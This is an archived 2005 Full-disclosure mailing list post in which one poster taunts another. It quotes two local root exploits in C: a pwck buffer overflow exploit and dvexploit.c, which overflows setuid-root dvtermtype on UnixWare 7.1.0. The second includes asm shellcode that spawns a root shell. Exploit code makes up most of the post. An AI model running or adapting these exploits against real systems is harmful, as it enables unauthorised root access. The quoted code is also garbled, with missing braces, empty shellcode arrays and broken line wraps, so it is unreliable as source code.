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Re: [Full-disclosure] PWCK Overflow POC Code Redhat/Suse older versions or something (maybe later too)

We all saw how short the code was I had for that pwck
buffer overflow exploit. He also hardcodes the stack
pointer, hahah.

#include <stdlib.h>
char shellcode[] =
unsigned long sp(void)         
{ __asm__("movl %esp, %eax");} 
int main(int argc, char *argv[])
  int i, offset;
  long esp, ret, *addr_ptr;
  char *buffer, *ptr;
  offset = 1700; //the offset I first found worked
  esp = sp();                
  ret = esp - offset;         
  buffer = malloc(2200);
  ptr = buffer;
  addr_ptr = (long *) ptr;
  for(i=0; i < 2200; i+=4)
  { *(addr_ptr++) = ret; }
  for(i=0; i < 1000; i++)
  { buffer[i] = '\x90'; }
  ptr = buffer + 200;
  for(i=0; i < strlen(shellcode); i++)
  { *(ptr++) = shellcode[i]; }
  buffer[2200-1] = 0;
  printf("d4yj4y fscked j00r mom!\n"); sleep(2);
   execl("/usr/sbin/pwck", "pwck", buffer, 0);
  return 0;

I have a feeling Steve was just mad mine was so short
compared to his, lol

 * dvexploit.c
 * written by : Stephen J. Friedl
 *              Software Consultant
 *              2000-06-24
 *              steve unixwiz net
 *      This program exploits the "Double Vision" system on
 *      Unixware 7.1.0 via a buffer overflow on the
 *      program. Double Vision is like a "pcAnywhere for
 *      but quite a few programs in this distribution are
 *      root. The problem is that these programs were not
 *      with security in mind, and it's not clear that they
 *      need to be setuid root.
 *      This particular program exploits "dvtermtype" by
passing a
 *      very long second parameter that overflows some
 *      buffer. This buffer is filled with a predicted
 *      of the shellcode, and the shellcode itself is
stored in
 *      a very long environment variable. This approach
 *      the shellcode much easier to find.
 *      This shellcode was based directly on the great work
 *      Brock Tellier (btellier usa net), who seems to
spend a lot
 *      of time within with various SCO UNIX release.
 *      This shellcode runs /tmp/ui, which should be this
 *      program:
 *      $ cd /tmp
 *      $ cat ui.c
 *      int main() { setreuid(0,0); system("/bin/sh");
return 0; }
 *      $ cc ui.c -o ui
 *      Brock's original work compiled this automatically,
but I
 *      prefer to do it by hand. A better approach is to do
 *      setreuid() in the shellcode and call /bin/sh
 *      Maybe another day.
 * ----------------------
 *      $ cc -v
 *      UX:cc: INFO: Optimizing C Compilation System  (CCS)
3.2  03/03/99 (CA-unk_voyager5)
 *      $ uname -a
 *      UnixWare foo 5 7.1.0 i386 x86at SCO UNIX_SVR5
 *      from /usr/lib/dv/README
 *              DoubleVision for Character Terminals Release 3.0
 *              Last Update:  December 7, 1999
 * ------
 *      The default parameters to this program work on the
versions mentioned
 *      above, but for variants some tuning might be
required. There are three
 *      parameters that guide this program's operation:
 *      -a retaddr      set the "return" address to the given
hex value,
 *                      which is the address where we expect to find the
 *                      exploit code in the environment. The environment
 *                      is at a relatively fixed location just below
 *                      0x80000000, so getting "close" is usually
 *                      Note that this address cannot have any zero bytes
 *                      in it! We believe that the target code has enough
 *                      padding NOP values to make it an easy target.
 *      -r retlen       length of the overflowed "return address"
 *                      which is filled in with the address provided
 *                      Default = 2k, max = 5k.
 *      -l n            slightly shift the alignment of the return
 *                      buffer by 1, 2 or 3 in case the buffer that's
 *                      overflowed.

#include <stdlib.h>
#include <stdio.h>

 * shellcode for SCO UnixWare
 *      The shellcode in the binary was derived from
assembler code
 *      below, and we put the asm() code inside the
function so we
 *      can disassemble it and get the binary bytes easier.
The code
 *      all should match, but the real original data is the
 *      asm() code.
#if 1

static const char scoshell[] =




extern char     scoshell[];

static void foo()

asm("           jmp     L1b");                  /* go to springboard    */
asm("   L2b:    popl    %esi");                 /* addr of /tmp/ui      */
asm("           xorl    %ebx,%ebx");            /* %ebx <-- 0           */
asm("           movl    %ebx,  7(%esi)");       /* mark end of string   */
asm("           movl    %ebx, 12(%esi)");       /* 0 to lcall addr      */
asm("           movb    %bl,  17(%esi)");       /* 0 to lcall sub addr
asm("           xorl    %eax,%eax");            /* %eax <-- 0           */
asm("           movb    $0x3b, %al");           /* 0x3b = "execve"      */
asm("           leal    7(%esi), %edi");        /* addr of NULL word    */
asm("           pushl   %ebx");                 /* zero                 */
asm("           pushl   %edi");                 /* addr of NULL word    */
asm("           pushl   %esi");                 /* addr of "/tmp/ui"    */
asm("           pushl   %esi");                 /* addr of "/tmp/ui"    */
asm("           jmp     L3b");                  /* do OS call           */
asm("   L1b:    call    L2b");
asm("           .ascii  \"/tmp/ui\"");          /* %esi                 */
asm("           .4byte  0xaaaaaaaa");           /* %esi[ 7]             */
asm("   L3b:    lcall   $0xaa07,$0xaaaaaaaa");  /* OS call              */
asm("           .byte   0x00");                 /* endmarker            */



#define NOP     0x90

static char     *env[10],       // environment strings
                *arg[10];       // argument vector

 * "Addr" is the predicted address where the shellcode
starts in the
 * environment buffer. This was determined empirically
based on a test
 * program that ran similarly, and it ought to be
fairly consistent.
 * This can be changed with the "-a" parameter.
static long     addr = 0x7ffffc04;

static char     *exefile = "/usr/lib/dv/dvtermtype";

int main(int argc, char *argv[])
int     c;
int     i;
char    egg[1024];
int     egglen = sizeof egg - 1;
int     retlen = 2048;
char    retbuf[5000];
int     align = 0;
char    *p;

        setbuf(stdout, (char *)0 );

        while ( (c = getopt(argc, argv, "a:r:l:")) != EOF )
                switch (c)
                  case 'a':     addr = strtol(optarg, 0, 16); break;
                  case 'l':     align = atoi(optarg); break;
                  case 'r':     retlen = atoi(optarg); break;

        if ( optind < argc )
                exefile = argv[optind++];

        printf("UnixWare 7.x exploit for suid root Double
        printf("Stephen Friedl <steve unixwiz net>\n");
        printf("Using addr=0x%x   retlen=%d\n", addr,

         * sanity check: the return buffer requested can't be
too big,
         * and the address can't have any zero bytes in it.
        if ( retlen > sizeof(retbuf) )
                printf("ERROR: retlen can't be > %d\n",

        p = (char *)&addr;

        if ( !p[0] || !p[1] || !p[2] || !p[3] )
                printf("ERROR: ret address 0x%08lx has a zero
byte!\n", addr);

         * Now create the "return" buffer that is used to
overflow the
         * return address. This buffer really has nothing in
it other than
         * repeated copies of the phony return address, and
one of them
         * will overwrite the real %EIP on the stack. Then
when the called
         * function returns, it jumps to our code.
         * It's possible that this requires alignment to get
right, so
         * the "-l" param above can be used to adjust this
from 0..3.
         * If we're aligning, be sure to fill in the early
part of the
         * buffer with non-zero bytes ("XXXX");
        strcpy(&retbuf, "XXXX");

        for (i = align; i < retlen - 4; i += 4)
                memcpy(retbuf+i, &addr, 4);
        retbuf[i] = 0;

        printf("strlen(retbuf) = %d\n", strlen( (char
*)retbuf) );

         * The "egg" is our little program that is stored in
the environment
         * vector, and it's mostly filled with NOP values but
with our little
         * root code at the end. Gives a wide "target" to
hit: any of the
         * leading bytes hits a NOP and flows down to the
real code.
         * The overall buffer is
         *      X=################xxxxxxxxxxxxxxxxxxxxx\0
         * where # is a NOP instruction, and "X" is the
exploit code. There
         * must be a terminating NUL byte so the environment
processor does
         * the right thing also.
        memset(egg, NOP, egglen);
        memcpy(egg, "EGG=", 4);

        // put our egg in the tail end of this buffer
        memcpy(egg + (egglen - strlen(scoshell)- 1),
scoshell, strlen(scoshell));

        egg[egglen] = '\0';

        /* build up regular command line */

        arg[0] = exefile;
        arg[1] = "dvexploit";           /* easy to find this later */
        arg[2] = (char *)retbuf;
        arg[3] = 0;

         * build up the environment that contains our
shellcode. This
         * keeps it off the stack.
        env[0] = egg;
        env[1] = 0;

        execve(arg[0], arg, env);

--- Day Jay <d4yj4y@xxxxxxxxx> wrote:
> Please teach me to be like you, I'm striving to be
> as
> good as you Steve. You obviously are my master.
> I bow to you.
> Please teach me! Your code is sooo l33t!
> --- Steve Friedl <steve@xxxxxxxxxxx> wrote:
> > On Mon, May 09, 2005 at 08:38:10AM -0700, Day Jay
> > wrote:
> > > I stole it, but it works, and that's all that
> > matters
> > 
> > "It works is all that matters" is the hallmark of
> an
> > amateur.
> > 
> > Steve
> > 
> > --- 
> > Stephen J Friedl | Security Consultant |  UNIX
> > Wizard  |   +1 714 544-6561
> > www.unixwiz.net  | Tustin, Calif. USA  | Microsoft
> > MVP | steve@xxxxxxxxxxx
> > 
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